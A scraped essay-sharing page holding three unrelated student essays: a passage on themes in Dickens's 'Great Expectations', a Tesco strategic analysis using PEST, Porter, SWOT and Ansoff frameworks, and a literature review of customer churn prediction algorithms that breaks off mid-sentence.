contrasting view given through Herbert Pocket and his father shows us that ‘no man who was not a true gentleman at heart, ever was, since the world began, a true gentleman in manner. Although Herbert has very little money, he is unquestionably a gentleman, both in the social sense, as he is well-born and has received an upper-class education, and in the moral sense, as he teaches Pip table manners, and, by example, that manners are meaningless unless they derive from sound moral principles. This is also illustrated through Compeyson, Miss Havershams lover, who possessed a superficial elegance that blinded people to his real nature. ‘He’s a gentleman, if you please, this villain’. Drummle is yet another example of an exaggerated type of gentleman. Although he has inherited money, and great expectations, he has no moral standards and remains idle, proud, reserved and suspicious. Dickens saw two sorts of gentlemen, Joe Gargery, who is a simple and hardworking blacksmith. He is also humble and kind. This was illustrated when he claimed that his father who was also a blacksmith ‘What sume’er the failings on his part, remember reader he were that good in his heart. ’ However, Drummle defined through his knowledge of social etiquette, the extent of his education, appearance and income. Dickens showed in his novel that one does not need to be wealthy and educated to be a gentleman. Crime and punishment is a key theme in ‘Great Expectations’ which is linked closely to justice and injustice. Pip is introduced to crime and criminals very early on when he is confronted with Magwitch on the marshes. This encounter compels Pip to steal from his own family, the iron file and the pork pie. So the first crime we see committed is by Pip, which is significant because the book is centred around crime and how Pip gets more and more involved. When Magwitch is caught, he is taken to the prison hulk where Pip got an insight into the justice system and saw how the prisoners were treated. Dickenss dissatisfaction with the prison system is evident when Wemmick is giving Pip a walking tour through the streets of London. Further evidence of Dickens concern can be found in Pips reaction to the Debtors Door of Newgate Prison, in which culprits came to be hanged. Using Pip as a vessel to express his latent views of criminals, Dickens expresses his deep-rooted memories of poverty and a father sentenced to debtors prison. This contradicts the fact that in real life, Dickens ‘believed’ the ‘model prisons’ to be too lenient to their inmates and extolled instead the virtues of hard and unrewarding labour, a regime which relied more upon punishment than moral improvement. This suggests that in real life, Dickens felt that it was more important to focus on the punishment of criminals, rather than giving them a second chance to redeem themselves. Further evidence of Dickenss concern for maximum punishment can be found in this statement regarding the punishment of a local street ruffian: ‘I would have his back scarified often and deep’. This attitude most likely stems from the fact that Dickens legal training gave him a far stricter outlook on prisoners. Dickens is often credited for being influential in the passing of the Capital Punishment Act of 1868, which banned public executions The reason Dickens was against public executions was because he felt they only made people sympathize too much with murderer, rather than the victim. Dickens paints an extremely vivid picture of childhood through the eyes and mind of Pip and sees the world through the eyes of a child. This was possible because Dickens understood the thoughts and feelings of children and applied this to Pips every thought and action when he wrote the novel. Dickens had an obvious gift for creating child characters in his works. The word ‘pip’ itself refers to a seed from a plant. Seeds need to be nurtured if they are to grow and flourish. In order to understand both Dickens talent and his compulsion to write about children it important to realize that through the characters in his novels he took up the plight of all children. In Dickens view of childhood, he felt that children have certain needs, for example, guidance in a nurturing home, to be free from emotional and physical abuse, to have a good education, and to be allowed to use their imaginations and as in the novel, Pip’s father figure, Joe Gargery had to work hard like his father before him and did not get an education. The phrase ‘brought up by hand’ implied emotional and physical abuse and yet it was meant to care and love in a very harsh way. In order for children to succeed in life he felt these needs must be met. Through his portrayal of child characters in the novel, Great Expectations, Dickens demonstrates how adults rarely, nor adequately provided for these particular needs that children have. In Great Expectations one can see how the women who fit Dickens ideas were rewarded with happy lives, usually in the form of marriage. Like in the case of Biddy, she was a nurse to a maimed Mrs. Joe and was the epitome of domesticity. She was later rewarded with a happy life by her marriage to Joe. Dickens imagines two types of women, subordinate and insubordinate, and rewards women according to their ability to render domestic harmony On the other hand, the women who did not conform to these ideas were punished in one way or another. Even though not all of Dickens attitudes reflected what was typical of the period, many did. Great Expectations is a reflection of those attitudes that were most likely encouraged by the women in his life. He believed as many did during the Victorian period that the womans place was in the home. Women were the caregivers of the world. Their lives were supposed to be centred on their family, for example, characters like Biddy and Clara Barley play the part of a natural, motherly type. Biddy takes over caring for Joe and Pip after Mrs. Joe is attacked by Orlick and dies soon after. Biddy, like Pip, is an orphan. She was the one that taught Pip to read and later taught Joe. Great Expectations is set in early Victorian England, a time when great social changes were sweeping the nation. The Industrial Revolution of the late eighteenth and early nineteenth centuries had transformed the social andscape, enabling capitalists and manufacturers to amass huge fortunes. Although social class was no longer entirely dependent on the circumstances of one’s birth, the divisions between rich and poor remained nearly as wide as ever. Throughout England, the manners of the upper class were very strict and conservative: gentlemen and ladies were expected to have thorough classical educations and to behave appropriately in innumerable social situations These criticisms as defined by Dickens in his novel were felt in almost every facet of Great Expectations. Pip’s sudden rise from country labourer to city gentleman forces him to move from one social extreme to another while dealing with the strict rules and expectations that governed Victorian England. Ironically, this novel about the desire for wealth and social advancement was written partially out of economic necessity. He also portrays characters caught up by social forces primarily via lower-class conditions but which usually steer them to tragic ends beyond their control.
Sunday, July 21, 2019
The Position Of Tesco In The Grocery Industry
The Position Of Tesco In The Grocery Industry The humble beginning of this grocery company started in 1919, and the name Tesco appeared first at the top of a shop at Edgware in 1929. This company has been growing in size and complexities ever since. The company is today the Britains leading retailer and the 3rd largest retailer in the world.(Guardian 2010) Presently, Tesco has more than 4,300 grocers, which now operate in 14 countries: South Korea, Malaysia, Japan, China, Republic of Ireland, Czech Republic, Slovakia, Turkey and Poland, Thailand, Asia, India and US. They have over 2,329 stores overseas and are still growing. The company is good at buying and selling. The company invest in what matters to people, and that is the major thing that propels Tesco progress. This progress bestowed on The Present Chief Executive Terry Leahy who has contributed immensely to the growth of the company and that is why he has spent 13 years in the position he is still maintaining that. This is evidenced by the launch of the Loyalty Scheme club card and, internet home shopping service etc. The company passed through the global recession and yet grew stronger than it was by recording a 10% increase in profit to a mighty  £3.4 billion at April 2010. 1.1 Environmental Analysis of Tesco (PEST) The environmental analysis of Tesco will help one understand what is happening both at the inside and outside of Tesco, and to increase the probability that the organisational strategies will appropriately reflect Tescos environment. The strategy of Tesco should be directed at exploiting the environmental opportunities and to block environmental threats in a way that is consistent with the internal capabilities (Robson, 1997). Although Tesco is waxing stronger and was able to declare 10% increase in profit in spite of the recession, the analysis is still important as to determine what might affect it in the future. Environmental analysis of a company should be continuous and feed all aspects of planning. Political Factors Presently, there is no huge recognisable factor affecting Tesco. However, the winner of the fourth coming election is still unknown. Speculations have it that the Labour might loose out for the conservatives. The new government coming in might bring in a lot of unfavourable or favourable laws and policies for the UK grocery industry and other industries as well. Economic Factors The scourge of global recession that hit around 2008, this affected a lot of sectors globally. It could rather be said that Tesco withstood it by improving on there strategy, by changing there prices to suite every classes of individuals without compromising the quality. This is evidenced by 10% increment in profit they declared this year, making over 3.4 billion this year. The chairman as at last year that I am pleased to report that despite the extra ordinary economic environment we find ourselves in, Tesco has once again delivered a good set of results. This demonstrates that Tesco is coping with the down town. Despite the challenging conditions around the globe we have remained resilient and are growing as fast as any major international retailer. (Tesco 2009). After the declaration of the huge 2010 profit, Terry Leahy declared the retailer stronger than it was before the recession. (Guardian 2010).Tesco used its strategy to beat the economic recession. So the economy had no nega tive e effect on Tesco. The spending power of people could equally affect groceries. The economic crunch has made quite a number of people change the way and manner at which they buy things. For instance, because of this economic crisis, a lot of people prefer to buy ingredient and cook because they see it cheaper to do so. Inflation is another powerful factor that could affect the grocery market. This is an incessant increase in the price of items and services, leading to a drop in the currencies purchasing power. Ta However, Economists believe that supply of money is the key factor of inflation.(Economy Watch 2010). Socio-cultural Factor Lifestyle, healthy and fresh produce, immigrants and produce lines.The behaviour of humans also matters in this business. Most customers prefer buying the Tesco branded products. They prefer they go for the fresh products. Tesco are sensitive to read people and know what they need with the club cards. The peoples religion might affect the way they buy things, they might declare fasting within a location it could be mostly in there international locations, and it will reduce the number of sales within such periods. So Tesco take time to consider these as it affects the business. The population of inhabitants and the kind of life they live and the class of people within an area affects a business. Technological Factor Technology is another key thing that contributes to Tescos success is the introduction of Tesco club card. This has helped Tesco in reading and knowing the need of over 16 million of there club card holders in the UK and over 400 million globally. They know what you need and they provide them, which is one of there key success factors. The implementation of Information technology has contributed towards the efficient management of inventories logistics and ware housing which helps in bringing the cost down. Automatic tills, their online operations, electronic supply chain management etc Industry Analysis UK grocery industry is a highly contributor towards UK economy, as buyers are in need everyday and people must satisfy their needs everyday. The buyers in the UK are equally very big because grocery/retail industry is a must in our everyday lives. There are a number of grocers in the UK: Tesco, Morrison, Asda, wal-mart, Sainsburys, Co-op, Iceland, Waitrose, MS, Netto, Farmfoods, Aldi, and Somerfield etc There are the major player in the industry which include Tesco , Sainsbury, Morrison, Iceland, Asda Wal-Mart, MS. The Grocery industry could be examined properly by adopting the Michael porters five forces. Which include the bargaining power of suppliers, the bargaining power of buyers, and threat of new entrants, Threats of substitutes and Rivalry among competitors? 2.1 Porter Five Forces: Tesco The bargaining power of supplier in this industry matters, the key player in the industry now is Tesco and there are others like Sainsburys, Iceland, Morrisons but Tesco is just the giant, in the UK grocery industry. They made a profit of  £3.4 billion this year 2010 despite the scourge of the economic down turn. Tesco as a competitor buy in a very large scale because they have over 2000 stores in the UK and about 2300 stores across the UK. They have a wider market share, and they have a very high advantage over there suppliers. This is critical success factor that Tesco picks on to keep on dominating in the industry. They could even fix prices for their suppliers. What then could be the fate of other competitors in the system? MS is great going by that brand name the company has. It is a nice advantage. Asda Wal-Mart is equally waxing well in the industry after it was acquired by Wal-Mart in 1999.They get there supplies within and outside of UK. Sainsburys adopted other means to beat the market, they grow there own organic products even their meat in order to grow and maintain stands in the market. They do this in collaboration with the farmers. The same applies to Morrisons and Iceland. They use other measures to get supplies, and they do not depend on a particular source of supplies. (Guardian 2010) Bargaining power of buyers in this industry is not so significant yet it matters in the sense that even though prices are fixed and the consumers (buyer) can not bargain, they can check in other outlets. In that case they will not buy the product. The availability of various grocers at a place will make prices drop more. Though the price drop down may not be in the favour of the competitors. It is beneficial to consumers, and not the buyers. For instance, Tesco as a top grocer, with over 2000 locations in UK and still expanding, have a higher market share, they have a higher supply advantage ,consumers will not have bargaining power over them, as they have already brought down their prices and have numerous locations scattered all over the city. This is most likely to be affecting other key players in the industry. New Entrant coming into the industry will easily start because of the large market share of the grocery industry but will rather find it very difficult to penetrate the market and beat the already existing competitors especially the giant like Tesco. The grocery environment in the UK could be seen as oligopolistic one. The major grocers in the UK are few and the market share for this industry is large. Yet it would be difficult for a new firm to spring up or rather the younger firms to rise, except for a bigger firm to acquire an existing one. Just like Wal-Mart acquired Asda in 1999. ( ASDA 2010). It is because of the high rate of competition in the industry, and most other grocers like Sainsburys, Morrisons, Iceland, and MS were adopted growth strategies, and where increasing there location most especially Tescos. The Grocers in the industry has diversified and they do a umber of different product ranging from home use products, electronics, technologies, automobile, etc. This is a strategy for them to survive in the industry. In this industry, threat of substitute does not really take so much effect; this is mostly all about food. Buying a product here is almost the same in the other shop. For instance buying a digestive biscuit in Tesco, you go to another shop to buy digestive of different brand, it does not make much effect because they are all biscuits. They do not deal on one item; they deal on a variety of items. So, one can not substitute tens of thousands of item, when a normal grocer does ten brand of same item or product. However, where threat could be envisaged is at, may be the health/hygiene product. For example, the government has publicized to encourage healthy eating. It recommends eating 5 a day it has been noted by many other food retailers, who now label their foods with in depth nutritional information. The degree of rivalry in the grocery industry in the UK is very high. Highly perishable items are part of the contributor of the rivalry in the industry. Tesco is indeed an extremely powerful economic force in the in the industry. They are growing every now and then. They have the highest number of branches in the UK; UK is their biggest market when compared to other locations outside the UK. This is evidenced by the huge profit of  £3.4 billion profit they recorded this 2010. It is a 10% increment in profit when compared to last years profit. It is today beloved that in every  £10 spent on grocery in the UK, Tescos account for  £3. Tesco occupy about 2/3 of the grocery market in the UK. Presently they are rated the 3rd retailer in the world. In addition to the degree of rivalry, this report will explain the competitors analysis that has been taken place in this industry (Quick MBA 2007). (remember to affix in text reference in the industry analysis where necessary) 3.0 Competitor Analysis for Tesco Porters five forces will be a better tool for accessing the stand point of Tesco in the grocery industry. These include the bargaining power of suppliers, the bargaining power of buyers, the threat of new entrant, threat of substitute and the degree of rivalry. The bargaining power of suppliers towards Tesco is very low, as Tesco is such a very large grocer. They have over 2000 stores within the UK only and 4300 stores in general, so as such they buy in a larger quantity far greater than its competitor. Going by this bulky purchase, the suppliers seem to be at their mercy because of their high demand of products. They tell the suppliers what to sell and they stick to that. Considering the huge profit they declared this year 2010, inspite of the economic downturn, the strategy they adopted was that they have envisaged the change in the behaviour of people, and they changed strategy by doing more discount, price ranging for various classes of people, whilst maintaining its quality, and doing more promotions. They tell the supplier what they will buy; they have no choice than to succumb to it. More so Tesco produce most of their foods and meat by employing or hiring people. (Tesco 2010). The bargaining power of buyers towards Tesco is obviously very poor. This report suggests that there is no power Tesco buyers have at all. Tesco is absolutely in charge. Tesco wields so much power in the grocery business and they have brought their prices so low to match different classes of people in the society. More over their prices are fixed already. They provide promo for their customers and issue free club cards that grants you point in any item you purchase that is above a pound. At the end they use it to calculate the points and read what your likes and shopping behaviour. With this, they give offers to its customers. So, Tesco always have their focus on its customers. (Guardian 2010). Threat of new entrant is never an issue to Tesco PLC because of their strengths, which include but are not limited to their brand name, the large number of their locations, The higher number of their staff, their chain business, The high power they have over their suppliers and buyer and so on. However, a new entrant can come as an existing world class retailer to acquire or merge with another top retailer that is the only way they could penetrate. Though even at that, it is still very difficult to beat Tesco most especially in the UK as it is evidenced in the 2010 Tescos strategic intent;to develop retailing services, maintain strong core UK business and be as strong as non-food, as in food. (Tesco 2010) Threat of new substitute could not be seen much in a high degree when it comes to Tesco and grocery industry at large. Tesco sell their branded food as well as other products from various brand. So any substitute that is food, every tendency is their for Tesco to sell it. Another thing is that because of their high bargaining power, they could buy over a producer and that product will be done in the name of Tesco. Nevertheless, the switching cost for customers could be easy, but it could be hindered by proximity barrier because before he could walk for 5 to 10 minutes, he will see another Tesco shop instead of others. One can not because of one item and travel so far. Tesco has withstood the threats of Rivalry in the grocery industry through a number of ways, these include: The long years of consistence and care towards its customers, Their high bargaining power, The loyalty they have built vis-à -vis their customers, Their high network of branches, their technologies, chains of other businesses, high performance all year round, they where able to make huge profits this year 2010. 10% increment against what they made last year in spite of the global down turn.(Tesco 2010). It is also believed presently that out of every  £10 spent on food here in the UK, Tesco accounts for  £3 pounds Guardian 2010). More so, Tesco keeps on bringing in more and more strategies that will make them be the no.1 in the world as they hope to be as strong in non food as in food, an international retailer, Maintain a strong core UK business, develop retailing services and put community at the heart of what they do. The competition is there, but Tesco has a core competency in the grocery industry. They wield much power. (Tesco is in the star position of the BCG Matrix. They have a high market growth rate and a high market share. Their 2010 revenue is  £62.54 billion while the 2010 operational income is  £3.41 billion i.e. 10% increment against 2009). 4.0 Portfolio Analysis This could be seen as the collection of a business and product that make up the company. The best business portfolio is the one that match the companys strengths and help bring out the attractive opportunities. The two better best known portfolio planning methods are the BCG matrix and the McKinsey / General Electric Matrix. In GE Matrix, market attractiveness replaced market growth of BCG as the dimension of the industry attractiveness and includes other range of factors other than the Market growth rate. Secondly, competitive strength replaces market share as the dimension by which the competitive position of each SBU is assessed. (Tutor2u 2010) Market Growth Rate of Tesco Tesco is a great force in the grocery market. The major strengths of Tesco is: they have their focus on customers at all times, Like the MD would ask what do you need. They believe that when you look after your customers, everything else will look after itself. Yes other companies are as focused as Tescos, but size of the company is a great strength. Having more locations means selling more, cause most shoppers goes to the nearest shop to buy. The more locations for Tesco brings about selling more, and selling more brings about better buying terms ,and which brings about lower pricing and or higher profit margin. The lower prices then bring in higher sales volume. Tesco has made itself classless with price ranges formed to cater across the board.(Guardian 2010). In summary, Tescos focus on customers; their numerous stores scattered all over and their classless pricing is the major strength that brings about the market growth. They declare huge profits at all year. In spite of the recession, Tesco declared  £3.41 billion profit this April 2010 i.e. a 10% increment in profit as against 2009 financial report. However, the people have a high demand for Tesco products majorly because its close to them and because they sell cheaper and general items, you must need in one or two ways. They have a very high bargaining power over their suppliers and buyers. Their market growth rate is indeed very high. Market Share of Tesco The club card which rewards customers is a good contributor to Tescos success. There is a research group called dunhumby co owned by Tesco, they analyse the 16 million cards and study the buying habits of there shoppers and tailor offers to them. This factor contributes to their high market share. Tesco has existed for 91 years, and as such they multiply in size and complexity as the year goes bye. This has given rise to so many loyalists to the company. The various promo they arrange for their shoppers from time to time especially at this recession, helps build up Tescos market share. Tesco today has the highest market share in the grocery industry in the UK. 5.0 SWOT Analysis for Tesco (Explain a brief about swot) Strengths of Tesco The strengths are those things that propel the steady growth of Tesco. Usually, they are positive things .It could be by way of action of the company, process, or service. These include: the introduction of Tesco club card which not only makes them no the no. Of their dedicated customers, but helps in offer to their customers. Tesco have a very high reputation in the grocery market and as such that makes their market share so high. The technologies Tesco have are an added advantage to them and they try to improve on it everyday. The own label ranges e.g. Tesco finest; Their range of store format e.g. Tesco express convenience stores, Tesco metro stores which can be found on high street and in city centres, Tesco super stores and Tesco extra-Hypermarket. they have They have a very powerful supplier relations ion. The scattered locations they have is an added advantage, their strengths is very high and they beat their rivals in the industry, They have over 2300 locations outside the co untry and still expanding. This adds to their market share globally. They have got a good distribution chain; Tesco has a very strong brand. Their online services is an advantage as well, they offer high quality items to people. Most of the other grocers in the UK does not have their own research company, but Tesco does and has contributed towards Tesco growth, especially in the area of Tesco club card. Above all, it is pertinent to note that Tesco withstands every force that may likely affect their grocery business. Weaknesses This could be seen as things that could or makes Tesco not to meet their objectives. This weakness could also be seen as those elements that hampers the growth and development of Tesco. Though that there is no recognisable weakness of Tesco because of their core competency and team player spirit they posses. One recognisable weakness this report may suggest is that they need to improve on their market, they have not yet fully covered the whole of UK; they do not provide fresh fruits in Tesco, especially at Tesco Express. They have not gained full dominance in the world when it comes to retails. Opportunities These are those external things that could improve the Tesco more. Some of the opportunities of Tesco include: Tescos objective to open a Tesco cash and carry shop at India is an opportunity for them to explore. Tesco plans to open bank this year 2010,They hope to create more employment this year by recruiting about 9000 employees more. Some of the other grocer is not doing well at the moment, so that could be an opportunity for them to acquire them. Threats Threats of Tesco are those factors that are beyond the control of Tesco, and they are likely to jeopardize the company. Some of these threats include: The daisy nature of area of investment or diversification could pose a threat due to unforeseen events. Grocers could start to reduce price even to a break-even point. There could be Likely tendency of 2 or more mergers to form a more formidable player in the industry to compete with Tesco, unforeseen inflation could pose a threat to Tescos Strategy and the value rate of GBP is dropped gradually in recent times. 6.0 Vision Providing value, care and satisfaction to its customers and its people; through collaborative efforts. 6.1 Mission To maintain a strong core local and international business by creating value for customers to earn their lifetime loyalty. 6.2 Objectives of Tesco This report states that the objectives of Tesco are: providing customers with quality items that goes in commensuration with their money value; offering progressive returns on investment for their shareholders, improving on technology and investing on efficient stores and distribution depot for profit maximisation. Build a long term rapport with the suppliers so as to gain a lasting relationship based on price and quality level; help in protecting the environment; focusing on the community and catering for them, through the provision of customers needs based on steady soughting of their opinion on the aspect of quality, pricing, innovation, technology and other aspects whilst acting on them; awarding all its staff an equal opportunity , by giving them good training and proper management practices; contributing in the National Food Industry Policy, in the area of food hygiene, health safety and nutrition. 6.3 Measures Some of the things Tesco should adopt in order to achieve there objectives is to continue with low price and promos because people has not fully recovered from the recession, in addition, they should also continue to increase their locations because their are some places that Tesco needs to establish in. Doing this could go a great length to be building more and more their market share they should extend this to the Tesco international, as this would take them up a bit in the global ranking. They should adhere strictly to any laid down format towards achieving the companys objectives; these include Key performance Indicator. They should continue to maintain and protect the Environment locally and internationally. Never should they fail in constantly taking care of there customers by fulfilling their social responsibility. Tesco must continual with staff training and management practice across board and equally invest more on RD, for farther progress. 6.4 Strategic Intent Inasmuch as Tesco has attained a height in the grocery industry in the UK, they need to take it up to a commanding height of excellence by becoming the no. 1 in the globe. They need to establish anywhere favourable in Africa, after a careful research. In that case, this report suggests that Tesco should improve on the position they are at present, and climb to the next level as a world leader in food and non food market. 7.0 Strategic Development The summary of Tescos Objectives is to be an international retailer, maintain a strong core UK business, be as strong as in non food as in food, develop retailing services and put community at the heart of what they do. The Ansoff matrix will be a better tool to decide Tescos development strategy. Tesco need to improve, to be rated no 1 in the globe. Existing Products New Products Existing Market New Market Diagram 1: Ansoff Matrix Representation. 7.1 Market Penetration Tesco need to spread more of their products (its known already) spread more branches within UK so as to make business impossible for new entrant, and make business tougher for the existing ones, more customers will be using the product etc. Market development Tesco need to expand and as such this strategy will Tesco sell their existing products at new markets. This is most needed in the overseas where they are yet to be known. Product development This strategy is essential to adopt when Tesco wants to introduce any of their new products into an existing market like UK. Diversification It is a strategy that will enable Tesco market new products such as other non food items, in a new market. Tesco hope to establish a bank soonest in the UK, they could equally strategize on extending to other countries. They should adopt this strategy would help. 8.0 Strategic Implementation For market penetration strategy, it needs to be adapted to in order to boost the market share. They will achieve this by continually highly distinguished competitive price and more promotions for the customers, personal selling is encouraged and advertising. This will go a great length to dominate the market for Tesco. The management of Tesco needs to approve aggressive promotional campaign, with this will go vis-à -vis a pricing strategy that will make other the market unattractive for other competitors. When they are doing this, they are restructuring a mature market for themselves. They also need to introduce a loyalty scheme. They should carry out a market development strategy to extend to those existing markets they have not been to with their already existing products. Just like some other countries in Asia. They should extend their existing products to such places. They need new competencies and those products should be modified so as to draw the attention of the existing market. Diversification could be a risky strategy. Tesco is about to start a Bank soon, which is expected to cash on opposition that exist amidst consumers toward UKs banks. (Guardian 2010),it is a good growth strategy for them, because this was what helped them, they started a non food items in 1997 which was led by Terry Leahy the chief Executive of Tesco (Tesco 2010) ands it immensely contributed to their profits. The Tesco non food raised 6.2% to  £13.1 billion with  £9 billion in the UK. They made  £4.1 billion in international. (Tesco corporate 2010). They should apply their usual process; use the competencies to carefully assess the risk involved and the gains in the diversification they would make. 9.0 Recommendations and Conclusion Inasmuch as Tesco is the leading grocer or retailer in the UK, they need to adopt the market penetration strategy of Ansoff matrix to dominate the market completely and broaden more and more their market share, thereby making the present notion that in every  £10 spent in grocery market in UK, Tesco account for  £3.The notion will change to every  £12 spent, Tesco accounts for  £6. It would be easier because they are not new in the market. Tesco need to use their competencies to extend and develop in foreign places, most especially Africa. They exist in almost other continents, but not Africa. Africa contributes either directly or indirectly so much towards the Economic growth in UK and America. (Lagos Chamber of commerce) Tesco should be continual in the study of customers so as to know the best strategy to adopt when there is another economic or socio-cultural situation. In conclusion, Tesco needs is a large diversified company and obviously they are doing better than others, but they still need to adhere to those measures and observe these suggested recommendations to be a world leader in retail industry. References/Bibliographies AICC (2010) Industry Analysis; The five forces [Online]. Available from: [Accessed: 26th April 2010] Economywatch (2010) Inflation; Economic inflation [Online]. Available from: [Accessed: 27th April 2010] Guardian, (2010) Tesco beats the recession to unveil record profits again [online].Available from: [Accessed: 25th April 2010] Porter M.E.(1980) Competitive Strategy; Technique for analysing industries and competitors. New York: First Free Press. Quick MBA (2007) Strategic Management [Online]. Available from: [Accessed: 25th April 2010] Robson W. (2007). Strategic Management and Information Systems. 2ed. Harlow: Pearson Education Limited. Smith P. J. (2006). Strategic Planning Readings. Cape Town: Creda Communications Socyberty, (2007) Government intervention in the UK supermarket Industry [Online] Available from: [Accessed: 25th April 2010] Tesco PLC, (2009) Tesco Annual Reports and Financial Statements 2009 [Online] Available from: [Accessed: 25th April 2010) Tesco corporate (2010) Tesco Plc Preliminary Results 2009/10 [Online] Available from: [Accessed: 27th April 2010) Tesco (2010) Media press releases 2010 [Online] Available from: [Accessed: 27th April 2010]
Multiple Churn Prediction Techniques And Algorithms Computer Science Essay
Multiple Churn Prediction Techniques And Algorithms Computer Science Essay Abstract-Customer churn is the business term that is used to describe loss of clients or customers. Banks, Telecom companies, ISPs, Insurance firms, etc. use customer churn analysis and customer churn rate as one of their key business metrics, because retaining an existing customer is far less than acquiring a new one. Corporates have dedicated departments which attempt to win back defecting clients, because recovered long term customers can be worth much more to a company than newly recruited clients. Customer Churn can be categorized into voluntary churn and involuntary churn. In voluntary churn, customer decides to switch to another service provider, whereas in involuntary churn, the customer leaves the service due to relocation, death, etc. Businesses usually exclude involuntary churn from churn prediction models, and focus on voluntary churn, because it usually occurs due to company-customer relationship, on which the company has full control. Churn is usually measured as gross churn and net churn. Gross churn is calculated as loss of previous customers and their associated recurring revenue, generated by those customers. Net churn is measured as sum of Gross Churn and addition of new similar customers. This is often measure as Recurring Monthly Revenue (RMR) in the Financial Systems. INTRODUCTION Predicting and preventing customer churn is becoming the primary focus of many enterprises. Every enterprise wants to retain its each and every customer, in order to maximize maximum profits and revenue from them. With the introduction of business and management systems, and automation of operation flow, corporates have gathered lots of customer and business related data during the daily operating activities, which give data mining techniques a good ground for working and predicting. Lots of data mining algorithms and models have emerged to rescue from this issue of customer loss. These algorithms have been widely used, from past decades, in this field. For prediction of customer churn, many algorithms and models have been applied. Most common of them are Decision tree [1], Artificial Neural Network [2], Logistic Regression [8]. In addition, other algorithms such as Bayesian Network [4], Support Vector Machine [], Rough set [5], and Survival Analysis [6] have also been used. In addition of algorithms and models, other techniques, such as input variable selection, feature selection, outlier detection, etc. have also been applied to get better results out of the above algorithms. First three models i.e. Decision tree, Artificial Neural Network and Logistic Regression have been applied maturely at multiple corporates. Each algorithm has been improved over multiple iterations, and are now pretty much stable. But as the operation and activities of business are growing, it is becoming more and more complex challenge to solve the problem of customer churn, and this is requesting for the generation of new churn prediction models, which are fast and robust, and which can quickly be trained and scored on large amounts of data. Literature review Jiayin and Yuanquan [1] presented a step by step approach on selecting effective input variables for customer churn prediction model in telecommunication industry. In telecommunication industry, there are usually very large number of input variables is available for churn prediction models. Of all these variables, there could be variables which have positive effect on the model, and few which are redundant. These redundant variables cause overload for the churn prediction model. So it is always better to select only important features and remove redundant, noisy and less informative variables. In their study, they have proposed Area under ROC (AUC) method for calculating classifying abilities of the variable, where ROC is Receiver Operating Characteristics, and then selecting variables which have the highest classifying abilities. In addition, he also proposed to compute mutual information among all selected variables and finally selecting variables which have relatively low mutual i nformation co-efficient. Huang and Kechadi [11] proposed a new technique for Feature Selection for the churn prediction models. As their primary focus was telecommunication industry, and in telecom the amount of input variables / feature is very large, and it is always better to select a subset of features, which have the most ability to classify the target classes. Otherwise running algorithm on all the input variables will be too much to time and resource consuming. Most commonly used techniques for selection of features only judges whether an input feature is helpful to classify the classes or not. The approach proposed by them takes into account the relationship between the specified categorical value of the feature and a class for selecting or removing the feature. Luo, Shoa and Lie [2] proposed the customer churn prediction using Decision Tree for Personal Handyphone System Service (PHSS), where the number of variables in input data set is very small. Decision Tree is probably the most commonly used data mining algorithm. Decision Tree model is a predictive model that predicts using a classification process. It is represented as upside down Tree, in which root is at the top and leaves are at the bottom. Decision Trees is the representation of rules. This helps us in understanding, why a record has been classified in a particular way. And these rules can be used to find records that fall into some specific category. In their work they found out the optimal values of input dataset with reference to time sub-period, cost of misclassification and sampling method. With their research, they came up to conclusion that 10-days of sub-period, 1:5 cost of misclassification and random sampling method are the most optimal parameters when training a data m odel using decision trees, when the number of input variables is very small. Ming, Huili and Yuwei [4] proposed a model for churn prediction using Bayesian Network. The concept of Bayesian Network was initially proposed by Judea Pearl (1986). This is a kind of graphics mode used to show the joint probability among different variables. It provides a natural way to describe the causality information which could be used in discovering the potential relations in data. This algorithm has been successively used in knowledge representation of expert system, data mining and machine learning. Recently, it has also been applied in fields of artificial intelligence, including causal reasoning, uncertain knowledge representation, pattern recognition cluster analysis and etc. A Bayesian network consists of many nodes representing attributes connected by some lines, so the problems are concerned that more than one attribute determine another one which involving the theory of multiple probability distribution. Besides, since different Bayesian networks have different structures and some conceptions in graph theory such as tree, graph and directed acyclic graph can describe these structures clearly, graph theory is an important theoretical foundation of Bayesian networks as well as the probability theory, thus the results of Customer Churn using Bayesian network are very promising. Jiayin, Yangming, Yingying and Shuang [10] proposed a new algorithm for churn prediction and called it TreeLogit. This algorithm is combination of ADTree and Logistic Regression models. It incorporates the advantages of both algorithms and making it equally good as TreeNet ® Model which won the best prize in 2003 customer churn prediction contest. As Treelogit combines the advantages of both base algorithms so it becomes very powerful tool for customer churn prediction. The Modeling process of TreeLogit starts by Designing Customers character variables based on prior knowledge. Then the character variables are categorized into m sub-vectors, and a decision tree for each sub-vector is created. Once we have the decision tree for each sub-vector, then we develop logistic regression models for each sub-vector. And finally we evaluate the accuracy and interpretability of the model. If they are acceptable then the customer retention process is started, otherwise the model is re-tuned for better results. Jing and Xinghua [5] in their work on customer churn prediction, presented a model based on Support Vector Machines. Support Vector Machines are developed on the basis of statistical learning theory which is regarded as the best theory for the small sample estimation and predictive learning. The studies on the machine learning of finite sample were started by Vapnik in sixties of last century and a relatively complete theoretical system called statistical learning theory was set up in nineties. After that, Support Vector Machines, a new learning machine was proposed. SVM is built on the structural risk minimization principle that is to minimize the real error probability and is mainly used to solve the pattern recognition problems. Because of SVMs complete theoretical framework and the good effects in practical application, it has been widely valued in machine learning field. Rough set Xu E, Liangeshan Shao, XXuedong Gao and Zhai Baofeng introduced Rough set algorithm for customer churn prediction [2]. Dengh Hu also studied the applications of rough set for customer churn prediction[5]. According to them, Rough set is a data analysis theory proposed by Z. Pawlak. Its main idea is to export the decision or classification rules by knowledge reduction at the premise of keeping the classification ability unchanged. This theory has some unique views such as knowledge granularity which make Rough set theory especially suitable for data analysis. Rough set is built on the basis of classification mechanism and the spaces partition made by equivalence relation is regarded as knowledge. Generally speaking, it describes the imprecise or uncertain knowledge using the knowledge that has been proved. In this theory, knowledge is regarded as a kind of classification ability on data and the objects in the universe are usually described by decision table that is a two-dimensional t able whose row represents an object and column an attribute. The attribute consists of decision attribute and condition attribute. The objects in the universe can be distributed into decision classes with different decision attributes according to the condition attributes of them. One of the core contents in the rough set theory is reduction that is a process in which some unimportant or irrelevant knowledge are deleted at the premise of keeping the classification ability unchanged. A decision table may have several reductions whose intersection was defined as the core of the decision table. The attribute of the core is important due to the effect to classification. Survival Analysis Survival analysis is a kind of Statistical Analysis method to analyze and deduce the life expectancy of the creatures or products according to the data comes from surveys or experiments. It always combines the consequences of some events and the corresponding time span to analyze some problems. It was initially used in medical science to study the medicines influence to the life expectancy of the research objects. The survival time should be acknowledged widely, that is, the duration of some condition in nature, society or technical process. In this paper, the churn of a customer is regarded as the end of the customers survival time. In the fifties of last century, the statisticians began to study the reliability of industrial products, which advanced the development of the survival analysis in theory and 